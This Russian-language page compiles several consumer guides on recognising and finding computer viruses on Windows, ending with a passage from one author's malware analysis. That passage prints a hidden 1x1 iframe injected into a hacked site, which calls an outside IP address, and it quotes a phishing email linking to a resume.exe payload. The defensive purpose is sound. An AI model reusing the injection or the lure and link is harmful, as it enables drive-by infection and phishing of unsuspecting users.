30.06.2016|07:59 Все методы обнаружения вирусов на компьютере

Здравствуйте, друзья мои. Интернет является неотъемлемой часть жизни современного человека. С другой стороны, он становится источником опасных вирусов, некоторые из которых следует удалять на начальных этапах «инфицирования». Но как выявить вирусы в компьютере? Какие самые распространенные симптомы заражения? Об этом и не только – в моей очередной статье.

Конечно же, подхватить «заразу» можно и без подключения к интернету. К примеру, если Вы вставляете в USB порт «вредоносную» флешку. Об этом я писал в статье как вирус блокирует USB порт. Или обмениваетесь файлами внутри рабочей сети.

На сегодняшний день даже самый лучший антивирус не обеспечивает 100% защиты.

Но есть множество способов обнаружить вирус даже без специального ПО. Сейчас я расскажу о них, но сначала мы рассмотрим основные признаки «заболевания».

Как узнать о заражении?

Хакеры, которые разрабатывают вредоносные скрипты, довольно хитрые особи, которые умело маскируют угрозу под безопасную программу. В любом случае, не нужно паниковать и видеть во всем опасность. Необходимо внимательно проанализировать ситуацию.

Начинать волноваться можно, когда:

• Во время запуска Windows появляется окно блокировки, которое содержит текст наподобие «Вы нарушили такие-то статьи криминального кодекса и дело будет передано в суд. Чтобы избежать этого, отправьте СМС / пополните счет и т.д.». Помните, не так давно я рассказывал об этом вирусе?
• Вы не можете зайти на сайты социальных сетей или поисковых систем. Опять же, появляется окно с предложением заплатить денег. Подробно об этом я писал в тематической статье.
• Система не слишком быстро реагирует на Ваши команды, медленно открываются приложения, процедура копирования / перемещения файлов длится слишком долго.
• Загрузка ОС занимает больше времени, чем раньше. Стоит учесть, что данный признак актуален, если Вы не инсталлировали сторонних приложений, которые могли прописаться в автозагрузке.
• Во время запуска ПК самостоятельно открывается браузер, его начальная страница изменена, постоянно расходуется сетевой трафик (хотя Вы ничего не делаете).
• От Вашего имени начинает рассылаться спам (через e-mail и аккаунты соцсетей).
• Перестает работать двойной щелчок мыши при открытии файлов (при условии, что манипулятор рабочий).
• Начинают бесследно пропадать документы, установленные приложения и прочие файлы.
• ПО не запускается или выполняется с ошибками, которых ранее не было.

Если имеют место быть какие-либо из перечисленных признаков, есть вероятность заражения. Но не стоит паниковать, ведь я всегда готов подсказать, как удалить вирусы.

Способы обнаружения

Я не буду рассказывать, как выявить вредоносный код (файл) с помощью антивирусного софта. Уверен, с этим справится каждый. Достаточно запустить полную проверку с помощью встроенного / стороннего ПО (Kaspersky, Dr.Web Cure It!).

Хочу подробнее рассказать о случае, когда система работает без антивируса (или от последнего нет никакой пользы).

Проверяем диспетчер процессов

Это первое, что приходит мне в голову, когда возникают подозрения. Зачастую, троян маскируется под безопасный процесс и делает свое темное дело. Как обнаружить?

Ого! Как много непонятных процессов. Как же найти лишние?

• Следует сразу же исключить системные.

1. Csrss
2. Lsass
3. Explorer
4. Svchost
5. Wininit
6. System
7. Winlogon

• Внимательно просмотрите Ваш перечень. «Шпионы» и прочие вредоносные программы могут скрываться под такими же названиями с разницей в одну-две буквы. Вот, присмотритесь:

• Если список содержит названия, состоящие из бессмысленного набора букв и цифр, стоит задуматься:

• Если в чём-то сомневаетесь, то лучше «забейте» название процесса в поисковой системе, чтобы узнать о нём побольше.

Одним из таких является вирус Recycler я рассказывал о как можно от него избавиться.

С диспетчером задач разобрались? Если есть вопросы, пишите в комментариях, я обязательно отвечу.

Анализируем автозагрузку

Большинство вирусов запускаются вместе с системой, блокируя её или активируя свои вредные функции. Хотите узнать, как «вычислить» таких злодеев?

• Вызываем окно «Выполнить» с помощью комбинации Win + R.
• Вводим команду «msconfig» для открытия конфигуратора Microsoft.

• На экране появится нечто подобное (только с другими элементами списка «Автозагрузка»):

• Опять же, смотрите на названия, проверяйте их через Google / Яндекс. Если уверены, что самостоятельно не добавляли элемент в автозапуск, и он не связан с установленным приложением, то смело удаляйте его.
• Перезапустите ПК и повторите предыдущие шаги. Если удаленный пункт снова активен, значит это однозначно вирус. Потребуется более доскональное сканирования и лечение.

Вот мы и разобрались с простейшими способами, которые позволят совершенно бесплатно выявить угрозу на начальном этапе. Такой подход максимально эффективен для предотвращения дальнейшего распространения «заразы». Больше материала можно найти в разделе лечение вирусов, там описаны самые распространенные вирусы и методы борьбы с ними.

Если статья оказалась полезной, почему бы не поблагодарить автора (это я о себе) репостами в социальных сетях. Буду очень признателен. И не забывайте, что при любой ситуации можете обращаться ко мне через форму комментирования.

С уважением, Виктор

Поддержите проект в Facebook и получайте больше интересных постов каждый день↓

Это может быть так же интересным:

it-tehnik.ru

Как найти вирус

Подключившись к Интернету, пользователи подвергают свою систему опасности заражения вирусами в гораздо большей степени, чем если бы компьютер работал без соединения с информационными сетями. И это естественно, ведь выходя во внешнее электронное пространство, пользователь дает “видеть” себя практически всем компьютерам, находящимся в этой сети. И далеко не все из этих систем являются “дружественными”. Может и так случиться, что зараженная машина, решит соединиться именно с Вашим компьютером и если найдет на нем какую-либо уязвимость, то немедленно поделится с Вами своими вирусами. Однако в большинстве случаев, пользователь сам соединяется с зараженными машинами, когда переходит на их сайты и качает с них файлы. Даже “навесив” на свою систему мощнейшую защиту, нельзя быть уверенным в полной неуязвимости.

Вирусописатели достаточно хитры, чтобы поймать на свои крючки даже достаточно опытных пользователей. Ниже я расскажу о том, как найти вирус на своем компьютере, если Вам кажется, что зараза все же проникла в Вашу систему.

Признаки заражения компьютера вирусами

Первое, что необходимо сделать пользователю, перед тем как начать “паниковать” это провести детальную процедуру поиска программной заразы и обнаружить признаки этого самого вируса. В чем они могут проявляться?

• Вход в систему блокируется окном с сообщениями о переводе денег за возможность дальнейшей работы.
• Вход на некоторые популярные сайты блокируется полностью, либо блокируется с выводом окна, в котором вымогатели требуют перечислить деньги за дальнейшее их пользование.
• Вы не можете попасть на свои страницы в социальных сетях и почтовых сервисах. Ранее действовавший пароль, теперь не является верным.
• Система периодически начинает очень медленно реагировать на команды пользователя: запуск программ, подключение к Интернету, копирование файлов, сканирование антивирусом, работа в Интернете.
• Система стала загружаться в несколько раз медленнее, при том, что дополнительных программ пользователем не устанавливалось.
• Подключение к Интернету запускается самостоятельно, даже если пользователь запретил автоматический запуск такого подключения.
• Ваши друзья и знакомые начинают жаловаться на спам, который приходит от Вас через Интернет.
• Появились неизвестные сообщения, отправленные с Ваших учетных записей в социальных сетях, почтовых сервисах, службах обмена сообщениями.
• Нет возможности открыть файловые диски в системе по двойному клику. При этом, обычно, открытие через контекстное меню правой кнопкой мыши продолжает работать.
• В системе обнаружилось исчезновение ранее установленных программ и созданных документов.
• В документах пользователя стали появляется надписи, которых он не оставлял.
• Некоторые из программ в системе перестали запускаться или запускаются с ошибками.

Конечно, далеко не все из выше перечисленного в явном виде указывает на причастность вирусов к проблемам в компьютерной системе, однако такое поведение уже должно насторожить Вас и заставить более детально заняться дальнейшей проверкой компьютера.

Как правильно найти вирус с помощью антивируса

Вы думаете, что наличие в Вашей системе антивируса или его установка избавит от программной заразы или даже обнаружит ее сразу же? Боюсь, что Вы немного ошибаетесь, возлагая такие надежды на антивирусы, если не знаете основных правил их работы и наиболее эффективных принципов нахождения и лечения вирусов с их помощью.

Во-первых, антивирус должен быть обновлен как можно более свежими версиями в двух аспектах. Один из которых означает постоянное обновление антивирусных баз данных. То есть тех источников данных, в которых описываются шаблоны всех известных вирусов. Без этих обновленных шаблонов, Вам не поможет ни один антивирус, так как он попросту не сможет распознать новый вирус среди и без того больших потоков информации, которые он исследует в реальном времени.

Второй аспект означает последнюю версию самой программы-антивируса. Так как методы заражения и распространения вирусов постоянно меняются, так же как и развитие операционных систем, антивирусу требуется постоянное обновление знаний о методах заражения, а также о поведении операционных систем, в которых находят новые уязвимости для проникновения программной заразы. Поэтому старый антивирус, даже с последними обновлениями вирусных баз может быть бесполезен при поиске уже известных ему вирусов, которые, тем не менее, знают как его обмануть и заставить не обращать на них внимание.

Но допустим, что у вас имеется последняя версия какого-либо антивируса с обновленными вирусными базами. Можно ли с его помощью найти все вирусы, плавающие в Вашей системе? Шанс конечно уже гораздо выше, но не достаточен для максимальной эффективности такой работы. В этом плане можно представить вирус как мошенника, уже втершегося в доверие к Вашей системе и способного манипулировать ее действиями, а значит и действиями антивирусной программы. Вирусы, которые еще только пытаются проникнуть на Ваш компьютер и вирусы, уже находящиеся в системе действуют в совершенно разных жизненных условиях и имеют несопоставимые привилегии. Первые являются как бы спящими и их достаточно легко обнаружить обновленными антивирусами. А вот вторые, это уже активные самостоятельные программные враги, которые по своему усмотрению могут совершить все необходимое, для того чтобы их не обнаружили. В том числе и грамотный обход проверки антивируса.

Как Вы уже поняли, не достаточно достоверно искать вирусы, запустив антивирус из своей же операционной системы. Значит нужно запустить его из внешней сторонней системы. Например, сняв винчестер и подключив его к другому, заведомо безвредному компьютеру. Если же такового под рукой не найдется, есть прекрасный способ запуска антивируса из сторонней системы с помощью уже подготовленных комплектов от антивирусных компаний. К примеру, таких как Kaspersky Rescue Disk или Dr.Web LiveCD.

Среда для запуска антивируса Касперского с внешнего CD диска

Запускаем антивирусный сканер от Dr.Web, загрузившись с CD диска

Вышеназванные комплекты представлены в виде ISO образов, которые могут быть записаны на CD или DVD диски с помощью таких программ как Nero Burning ROM, Daemon Tools, CDBurnerXP и тому подобных. После записи образов на диск, достаточно будет перезапустить компьютер и произвести загрузку с этих дисков. Теперь Вы можете управлять антивирусом из гарантированно безопасной системы и быть уверенным в том, что никакие вирусы ее не контролируют. А это означает максимальную эффективность в деле поиска вирусов на своем компьютере.

Как найти вирус самостоятельно

Поиск вируса, что называется “вручную” требует от пользователя достаточно хороших знаний процессов и ресурсов операционной системы. В некоторых случаях вирусы удается распознать практически сразу, иногда приходиться повозиться с изучением того или иного неизвестного процесса. Однако в любом случае следует иметь в виду, что антивирусы далеко не полная панацея от сетевой заразы. Если Вам посчастливилось “схватить” виртуальную инфекцию, только что выпущенную на просторы глобальной сети, то, скорее всего, антивирусные компании даже не знают об этом типе вируса. А значит и найти его, с их помощью, вряд ли удастся, даже не смотря на то, что неизвестные вирусы антивирусными программами все же могут быть идентифицированы в ряде случаев. Как же тогда пользователь сможет распознать программного врага в своем стане? Для этого я приведу здесь несколько советов.

I. Воспользуйтесь “Диспетчером задач”.

Этот простой инструмент Ваш первый друг и помощник в деле поиска вирусов. Именно с его помощью можно получить список процессов (или попросту говоря программ), которые крутятся в памяти Вашего компьютера на данный момент. Есть и более продвинутые версии для анализа процессов. Например, Process Explorer или System Explorer. Однако даже с простым системным “диспетчером задач” можно провести весь необходимый анализ, а расширенными версиями пользоваться, только если этот диспетчер блокируется вирусами. Запустить диспетчер можно комбинацией клавиш “Ctrl + Shift + Esc” или вызвать посредством стандартного “Ctrl + Alt + Del”.

На какие подозрительные процессы нужно обращать внимание.

Все, найденные, подозрительные названия файлов нужно будет проверить в базе данных известных процессов. Такие базы можно найти по следующим адресам:

http://wiki.compowiki.info/ProcessyWindows (русскоязычный)

http://www.what-process.com (англоязычный)

http://www.tasklist.org (англоязычный)

Либо воспользоваться обыкновенной поисковой системой, куда в качестве запроса нужно ввести имя подозрительного процесса.

Если Вы заподозрили какие-либо уже известные процессы, но они помечены в базах как безвредные, то можно оставить их в покое. Даже в том случае, если они и содержат вирусы исследовать их можно только с помощью глубоких знаний ассемблера и специальных программных инструментов.

Обратите внимание на процессы, упоминание о которых не нашлось на вышеописанных сайтах. Во-первых, определите текущую директорию запуска подозрительной программы. Для этого нужно просто кликнуть по процессу правой кнопкой мыши и перейди к окну “Свойства”.

Данное действие применимо к операционной системе версии Windows 7. Для пользователей Windows XP рекомендуется воспользоваться продвинутыми версиями “Диспетчера задач”, ссылки на которые я приводил выше.

В этом окне можно увидеть информацию о названии исполняемого файла, посредством которого произошел запуск процесса и папку, где эта программа расположена. Обратите внимание на атрибуты исследуемого EXE файла. Если он имеет свойство “Скрытый”, то доверия такой файл уже точно не вызывает.

Также на причастность к семейству вирусов может указывать и сам путь, указанный в пункте “Расположение”. Самыми подозрительными являются каталоги временных файлов, такие как Temporary Internet Files и Temp. Большое число вирусов используют именно эти папки как площадки для запуска. Также будет весьма странным, если неизвестная (даже по базам с описаниями процессов) программа окажется запущенной из каталога System.

Здесь можно увидеть сведения о версии программы, ее разработчике и официальном названии. Вирусописатели не часто стараются подделывать подобные сведения, чтобы запутать пользователей или не вызвать подозрения отсутствием такого описания. По крайней мере, отсутствие данных сведений даст еще один повод подозревать исследуемую программу во вредоносности.

Процесс также может обладать свойством цифровой подписи, что отразиться на появлении одноименной вкладки. Конечно, далеко не все процессы могут иметь такую вкладку, однако наличие ее уже говорит о том, что данный файл прошел соответствующую проверку и сертификацию и скорее всего не представляет никакого вреда для системы.

И хотя подделать такую подпись весьма затруднительно, но все же возможно, вряд ли вирусописатели станут тратить свои силы ресурсы ради небольшой выгоды от такого “дорогого” в разработке вируса. Поэтому анализ подобных файлов можно со спокойной душой отложить в сторону.

II. Проверьте автозагрузку

Весьма полезным делом будет также проверка программ, находящихся в автозапуске. Не редко вирусы запускаются, не маскируясь, прямо из стандартных ресурсов для автозагрузки. Чтобы посмотреть список таких программ, перейдите в “Пуск”, откройте окно “Выполнить” и наберите команду “msconfig”. В результате должно появиться окно следующего вида:

Здесь действуют те же правила что и при анализе процессов из “диспетчера задач”. Обращайте внимание на все подозрительные имена объектов и их производителей, исследуйте каталоги, посредством которых они запускаются (столбец “Команда”).

Самые подозрительные программы можно отключать на запуск. Для этого просто снимите галочку напротив них. Однако будьте внимательны, если после перезапуска системы деактивированные программы, вновь поставили себя на запуск, то подобное поведение очень подозрительно и такие файлы стоит обследовать более досконально.

Теперь Вы знаете, как найти вирус на своем компьютере, если обнаружили подозрительное поведение системы. Остается только избавиться от него простым удалением файла с жесткого диска. Правда, не все вирусы позволяют безропотно удалять себя из системы, однако даже в этом случае вам на помощь придут антивирусные CD комплекты, о которых я рассказывал выше. Ведь достаточно только загрузиться с них и можно без проблем удалять идентифицированные Вами вирусы. На все Ваши вопросы я готов ответить посредством комментариев ниже. О том, как удалить вирусы самостоятельно я напишу несколько позже. Следите за обновлением сайта, с помощью RSS.

inetedu.ru

Диспетчер задач: подозрительные процессы. Как найти и удалить вирус?

Добрый день.

Большинство вирусов в ОС Windows стараются скрыть свое присутствие от глаз пользователя. Причем, что интересно, иногда вирусы очень хорошо маскируются под системные процессы Windows да так, что даже опытному пользователю с первого взгляда не найти подозрительный процесс.

Кстати, большинство вирусов можно найти в диспетчере задач Windows (во вкладке процессы), а затем посмотреть их месторасположение на жестком диске и удалить. Только вот какие из всего многообразия процессов (а их там иногда несколько десятков) - нормальные, а какие считать подозрительными?

В этой статье расскажу, как я нахожу подозрительные процессы в диспетчере задач, а так же, как потом удаляю вирусную программу с ПК.

1. Как войти в диспетчер задач

Нужно нажать сочетание кнопок CTRL + ALT + DEL или CTRL + SHIFT + ESC (работает в Windows XP, 7, 8, 10).

В диспетчере задач можно просмотреть все программы, которые в данный момент запущены компьютером (вкладки приложения и процессы). Во вкладке процессы можно увидеть все программы и системные процессы, которые работают в данный момент на компьютере. Если какой-то процесс сильно грузит центральный процессор (далее ЦП) - то его можно завершить.

Диспетчер задач Windows 7.

2. AVZ - поиск подозрительных процессов

В большей кучи запущенных процессов в диспетчере задач не всегда просто разобраться и определить где нужные системные процессы, а где "работает" вирус, маскирующийся под один из системных процессов (например, очень много вирусов маскируется, называя себя svhost.exe (а ведь это системный процесс, необходимый для работы Windows)).

На мой взгляд, очень удобно искать подозрительные процессы с помощью одной антивирусной программы - AVZ (вообще, это целый комплекс утилит и настроек для обеспечения безопасности ПК).

Для начала работ, просто извлеките содержимое архива (который скачаете по ссылке выше) и запустите программу.

AVZ - меню сервис.

Рекомендую сначала зайти в менеджер автозапуска и посмотреть, какие же программы и процессы грузятся при старте Windows. Кстати, на скриншоте ниже вы можете заметить, что некоторые программы помечены зеленым цветом (это проверенные и безопасные процессы, внимание уделите тем процессам, которые черного цвета: нет ли среди них чего-нибудь, что вы не устанавливали?).

AVZ - менеджер автозапуска.

В диспетчере процессов картина будет похожей: тут отображаются процессы, которые работают в данный момент на вашем ПК. Особое внимание уделите процессам черного цвета (это те процессы, за которые поручиться AVZ не может).

AVZ - Диспетчер процессов.

Например, на скриншоте ниже показан один подозрительный процесс - он вроде системный, только о нем AVZ ничего не знает... Наверняка, если не вирус - то какая-нибудь рекламная программа, открывающая какие-нибудь вкладки в браузере или показывая баннеры.

Вообще, лучше всего при нахождении подобного процесса: открыть его место хранения (щелкнуть правой кнопкой мышки по нему и выбрать в меню "Открыть место хранение файла"), а затем завершить этот процесс. После завершения - удалить все подозрительное из места хранения файла.

После подобной процедуры проверить компьютер на вирусы и adware (об этом ниже).

Диспетчер задач Windows - открыть место расположение файла.

3. Сканирование компьютера на вирусы, Adware, трояны и пр.

Чтобы просканировать компьютер на вирусы в программе AVZ (а сканирует она достаточно хорошо и рекомендуется в качестве дополнения к вашему основному антивирусу) - можно не задавать никаких особенных настроек...

Достаточно будет отметить диски, которые будут подвергнуты сканированию и нажать кнопку "Пуск".

Антивирусная утилита AVZ - санирование ПК на вирусы.

Сканирование достаточно быстрое: на проверку диска в 50 ГБ - на моем ноутбуке потребовалось минут 10 (не более).

После полной проверки компьютера на вирусы, я рекомендую проверить компьютер еще такими утилитами, как: ADW Cleaner или Mailwarebytes.

AdwCleaner - сканирование ПК.

4. Исправление критических уязвимостей

Оказывается, не все настройки Windows по умолчанию безопасны. Например, если у вас разрешен автозапуск с сетевых дисков или сменных носителей - при подключении оных к вашему компьютеру - они могут его заразить вирусами! Чтобы этого не было - нужно отключить автозапуск. Да, конечно, с одной стороны неудобно: диск теперь не будет авто-проигрываться, после его вставки в CD-ROM, зато ваши файлы будут в безопасности!

Для изменения таких настроек, в AVZ нужно перейти в раздел файл, а затем запустить мастер поиска и устранения проблем. Далее просто выбираете категорию проблем (например, системные), степень опасности и затем сканируете ПК. Кстати, здесь же можно и очистить систему от мусорных файлов и подчистить историю посещения различных сайтов.

AVZ - поиск и устранение уязвимостей.

Кстати, если вы не видите часть процессов в диспетчере задач (ну или что-то грузит процессор, но среди процессов нет ничего подозрительного) - то рекомендую воспользоваться утилитой Process Explorer (https://technet.microsoft.com/ru-ru/bb896653.aspx).

На этом все, удачи!

Социальные кнопки:

pcpro100.info

Как найти вирус. Признаки заражения компьютера

Многие компьютеры заражены вирусами, и пользователи не подозревают об этом. Не все антивирусы способны обеспечивать надежную защиту. Признаки заражения компьютера позволят Вам быстро найти вирус в Вашем компьютере.

Когда компьютер начинает нестабильно работать, самостоятельно запускать программы и окна, перезагружаться и не отвечать на команды, многие пользователи начинают искать неполадки в программном и аппаратном обеспечении компьютера. Зачастую пользователь не думает что это вирус, ведь у него установлен антивирус и значит, он абсолютно защищен от вирусов. К сожалению это не так.

Даже самый современный и дорогой антивирус, который постоянно проверяет компьютер и обновляет антивирусные базы, не способен обеспечить 100% защиту от вирусов. Есть небольшая вероятность того, что Вы поймаете редкий вирус, который недавно появился. Но это не значит, что нужно отказываться от использования антивируса. На каждом компьютере должен быть обязательно установлен антивирус. Определить, есть ли на компьютере вирус, помогут признаки заражения компьютера.

Признаки заражения компьютера

• Замедление работы компьютера, медленный запуск программ и системы.
• Появление окон и табличек с требованиями отправить смс, пополнить баланс, шантажом и угрозами.
• Нереагирование компьютера на нажатие клавиш или мыши. Переназначение функций клавиатуры и мыши.
• Сброс и смена паролей на сайты или учетные записи.
• Изменение разрешения фалов и папок, скрытие и шифрование папок.
• Пропажа файлов и папок.
• Увеличение передаваемых по сети данных.
• Блокировка доступа к некоторым сайтам.
• Ошибки при запуске программ.
• Высокая загрузка центрального процессора в простое.
• Появление и автозапуск неизвестных процессов.

Все эти признаки могут свидетельствовать, что в Вашем компьютере завелся вирус. Но это не значит что 100% дело именно в вирусе. При появлении подобных признаков, необходимо принять меры, что бы найти вирус. Заражение компьютера может происходить быстро, и чем быстрее Вы найдете вирус, тем лучше.

Как найти вирус

На вашем компьютере должен быть установлен надежный антивирус. Что бы выбрать лучший антивирус, воспользуетесь рейтингом антивирусов. Помните что платные антивирусы, в большинстве случаев, гораздо более эффективны, чем бесплатные. Лучше заплатить деньге, чем терять время, нервы и драгоценную информацию.

Что бы найти вирус обновите антивирусные базы своего антивируса и запустите проверку компьютера. Обязательно необходимо проверить системный диск, загружаемые модули и программы. Обновление баз необходимо и поможет в том случае, если разработчики антивируса обнаружили Ваш вирус и внесли его в свои антивирусные базы.

Но что делать, если Ваш антивирус не обеспечивает надежной защиты, и Вы ему не доверяете? Для этого необходимо воспользоваться бесплатными программами для проверки на вирусы. Это программы применяются для разовой проверки компьютера и неспособны обеспечить защиту в реальном времени. Их основная задача – найти и уничтожить вирусы, которые не нашел Ваш основной антивирус. Самыми популярными являются Dr.Web CureIt и Kaspersky Security Scan.

Все что нужно – запустить одну из этих программ и подождать пока они проведут полное сканирование компьютера. Для большей эффективности, можно запустить эти программы в безопасном режиме. Если указанные утилиты найдут вирусы, то следует задуматься о смене Вашего основного антивируса на более надежный.

В крайнем случае, вирусы могут так сильно повредить Ваш компьютер, что после их удаления необходимо переустановить всю операционную систему. Но к счастью, это происходит очень редко.

Если проведенной сканирование на вирусы не дало результата (вирусы не найдены), а признаки заражения компьютера продолжают появляться, то стоит задуматься о физической неисправности одного или нескольких частей компьютера. Но для начала, переустановите операционную систему. Возможно, Вы просто захламили ее и вирусы тут совсем не причем.

Что делать, если антивирус не справился со своей работой.

    Вы, наверно, неоднократно встречали информацию в СМИ о том, что появился новый страшный вирус, который может привести к новой страшной эпидемии и чуть ли не к концу Интернета. Или, что появилась новая технология вирусописания, основанная на использовании младших битов пикселей графических изображений, и тело вируса практически невозможно обнаружить. Или... много еще чего страшненького. Иногда вирусы наделяют чуть ли не разумом и самосознанием. Происходит это от того, что многие пользователи, запутавшись в сложной классификации и подробностях механизма функционирования вирусов, забывают, что в первую очередь, любой вирус - это компьютерная программа, т.е. набор процессорных команд (инструкций), оформленных определенным образом. Неважно, в каком виде существует этот набор (исполняемый файл, скрипт, часть загрузочного сектора или группы секторов вне файловой системы) - гораздо важнее, чтобы эта программа не смогла получить управление, т.е. начать выполняться. Записанный на ваш жесткий диск, но не запустившийся вирус, также безобиден, как и любой другой файл. Главная задача в борьбе с вирусами - не обнаружить тело вируса, а предотвратить возможность его запуска. Поэтому грамотные производители вирусов постоянно совершенствуют не только технологии занесения вредоносного программного обеспечения в систему, но и способы скрытного запуска и функционирования.

Как происходит заражение компьютера вредоносным программным обеспечением (вирусом)? Ответ очевиден - должна быть запущена какая-то программа. Идеально - с административными правами, желательно - без ведома пользователя и незаметно для него. Способы запуска постоянно совершенствуются и основаны, не только на прямом обмане, но и на особенностях или недостатках операционной системы или прикладного программного обеспечения. Например, использование возможности автозапуска для сменных носителей в среде операционных систем семейства Windows привело к распространению вирусов на флэш-дисках. Функции автозапуска обычно вызываются со сменного носителя или из общих сетевых папок. При автозапуске обрабатывается файл Autorun.inf . Этот файл определяет, какие команды выполняет система. Многие компании используют эту функцию для запуска инсталляторов своих программных продуктов, однако, ее же, стали использовать и производители вирусов. В результате, об автозапуске, как некотором удобстве при работе за компьютером, можно забыть. - большинство грамотных пользователей данную опцию отключили навсегда.

Для отключения функций автозапуска в Windows XP/2000 reg-файл для импорта в реестр.

Для Windows 7 и более поздних отключение автозапуска можно выполнить с использованием апплета "Автозапуск" панели управления. В этом случае отключение действует по отношению к текущему пользователю. Более надежным способом защиты от внедрения вирусов, переносимых на съемных устройствах, является блокировка автозапуска для всех пользователей с помощью групповых политик:

запустить редактор групповых политик gpedit.msc

перейти в "Конфигурация компьютера" - - "Конфигурация Windows" - "Административные шаблоны" - "Компоненты Windows" - "Политика автозапуска".

установить значение "Вкл." для компонента "Отключить автозапуск"

    Но основным "поставщиком" вирусов, несомненно, является Интернет и, как основное прикладное программное обеспечение - "Обозреватель Интернета" (браузер). Сайты становятся все сложнее и красивее, появляются новые мультимедийные возможности, растут социальные сети, постоянно увеличивается количество серверов и растет число их посетителей. Обозреватель Интернета постепенно превращается в сложный программный комплекс - интерпретатор данных, полученных извне. Другими словами, - в программный комплекс, выполняющий программы на основании неизвестного содержимого. Разработчики обозревателей (браузеров) постоянно работают над повышением безопасности своих продуктов, однако производители вирусов тоже не стоят на месте, и вероятность заражения системы вредоносным ПО остается довольно высокой. Существует мнение, что если не посещать "сайты для взрослых", сайты с серийными номерами программных продуктов и т.п. то можно избежать заражения. Это не совсем так. В Интернете немало взломанных сайтов, владельцы которых даже не подозревают о взломе. И давно прошли те времена, когда взломщики тешили свое самолюбие подменой страниц (дефейсом). Сейчас подобный взлом обычно сопровождается внедрением в страницы вполне добропорядочного сайта, специального кода для заражения компьютера посетителя. Кроме того, производители вирусов используют наиболее популярные поисковые запросы для отображения зараженных страниц в результатах выдачи поисковых систем. Особенно популярны запросы с фразами "скачать бесплатно" и " скачать без регистрации и SMS". Старайтесь не использовать эти слова в поисковых запросах, иначе, риск получения ссылки на вредоносные сайты значительно возрастает. Особенно, если вы ищете популярный фильм, еще не вышедший в прокат или последний концерт известнейшей группы.

    Механизм заражения компьютера посетителя сайта, в упрощенном виде, я попробую объяснить на примере. Не так давно, при посещении одного, довольно популярного сайта, я получил уведомление программы мониторинга автозапуска (PT Startup Monitor) о том, что приложение rsvc.exe пытается выполнить запись в реестр. Приложение было благополучно прибито FAR"ом, а изменения в реестре отменены PT Startup Monitor"ом. Анализ страниц сайта показал наличие странного кода на языке Javascript, выполняющего операции по преобразованию строковых данных, не являющихся осмысленным текстом. Язык Javascript поддерживается большинством современных браузеров и используется практически на всех веб-страницах. Сценарий, загружаемый с таких страниц, выполняется обозревателем Интернета. В результате многочисленных преобразований упомянутых выше строк получался довольно простой код:

iframe src="http://91.142.64.91/ts/in.cgi?rut4" width=1 height=1 style="visibility: hidden"

Означающий выполнение CGI-сценария сервера с IP - адресом 91.142.64.91 (не имеющего никакого отношения к посещаемому сайту) в отдельном окне (тег iframe) размером 1 пиксель по ширине и 1 пиксель по высоте, в невидимом окне. Результат - вполне вероятное вирусное заражение. Особенно, если нет антивируса или он не среагирует на угрозу. Данный пример скрытого перенаправления посетителя на вредоносный сайт с использованием тега "iframe" сегодня, наверно, не очень актуален, но вполне демонстрирует как, посещая легальный сайт, можно незаметно для себя побывать и на другом, не очень легальном, даже не подозревая об этом. К сожалению, абсолютной гарантии от вирусного заражения нет и нужно быть готовым к тому, что с вирусом придется справляться собственными силами.

    В последнее время, одним из основных направлений развития вредоносных программ стало применение в них всевозможных способов защиты от обнаружения антивирусными средствами - так называемые руткит (rootkit) - технологии. Такие программы часто или не обнаруживаются антивирусами или не удаляются ими. В этой статье я попытаюсь описать более или менее универсальную методику обнаружения и удаления вредоносного программного обеспечения из зараженной системы.

    Удаление "качественного" вируса, становится все более нетривиальной задачей, поскольку такой вирус разработчики снабжают свойствами, максимально усложняющими ее решение. Нередко вирус может работать в режиме ядра (kernel mode) и имеет неограниченные возможности по перехвату и модификации системных функций. Другими словами - вирус имеет возможность скрыть от пользователя (и антивируса) свои файлы, ключи реестра, сетевые соединения, - все, что может быть признаком его наличия в зараженной системе. Он может обойти любой брандмауэр, системы обнаружения вторжения и анализаторы протоколов. И, кроме всего прочего, он может работать и в безопасном режиме загрузки Windows. Иными словами, современную вредоносную программу очень непросто обнаружить и обезвредить.

    Развитие антивирусов тоже не стоит на месте, - они постоянно совершенствуются, и в большинстве случаев, смогут обнаружить и обезвредить вредоносное ПО, но рано или поздно, найдется модификация вируса, которая какое-то время будет "не по зубам" любому антивирусу. Поэтому самостоятельное обнаружение и удаление вируса - это работа, которую рано или поздно придется выполнять любому пользователю компьютера.

Здравствуйте.
Нас заинтересовала ваша кандидатура, однако предлагаем вам заполнить
наш фирменный бланк резюме и отправить его по адресу [email protected]
Ответ не гарантируется, однако если Ваше резюме нас заинтересует, мы
позвоним Вам в течение нескольких дней. Не забудьте
указать телефон, а также позицию, на которую Вы претендуете. Желательно
также указать пожелания по окладу.
Наш фирменный бланк вы можете скачать по нижеуказанной ссылке.
http://verano-konwektor.pl/resume.exe

    Анализ заголовков письма показал, что оно было отправлено с компьютера в Бразилии через сервер, находящийся в США. А фирменный бланк предлагается скачать с сервера в Польше. И это с русскоязычным-то содержанием.

    Ясное дело, что никакого фирменного бланка вы не увидите, и скорее всего, получите троянскую программу на свой компьютер.
    Скачиваю файл resume.exe. Размер - 159744 байта. Пока не запускаю.
    Копирую файл на другие компьютеры, где установлены различные антивирусы - просто для очередной проверки их эффективности. Результаты не ахти - антивирус Avast 4.8 Home Edition деликатно промолчал. Подсунул его Symantec"у - та же реакция. Сработал только AVG 7.5 Free Edition. Похоже, этот антивирус, в самом деле, не зря набирает популярность.
    Все эксперименты выполняю на виртуальной машине с операционной системой Windows XP. Учетная запись с правами администратора, поскольку, чаще всего вирусы успешно внедряются в систему только, если пользователь является локальным администратором.
    Запускаю. Через какое-то время зараженный файл исчез, похоже, вирус начал свое черное дело.
    Поведение системы внешне не изменилось. Очевидно, нужна перезагрузка. На всякий случай, запрещаю в брандмауэре соединения по протоколу TCP. Оставляю разрешенными только исходящие соединения по UDP:53 (DNS) - надо же оставить вирусу хоть какую-то возможность проявить свою активность. Как правило, после внедрения, вирус должен связаться с хозяином или с заданным сервером в интернете, признаком чего будут DNS-запросы. Хотя, опять же, в свете сказанного выше, умный вирус может их замаскировать, кроме того, он может и обойти брандмауэр. Забегая вперед, скажу, что в данном конкретном случае этого не произошло, но для надежного анализа сетевой активности весь трафик зараженной машины лучше пустить через другую, незараженную, где можно быть уверенным, что правила брандмауэра выполняются, а анализатор трафика (я пользовался Wireshark"ом) выдает то, что есть на самом деле.
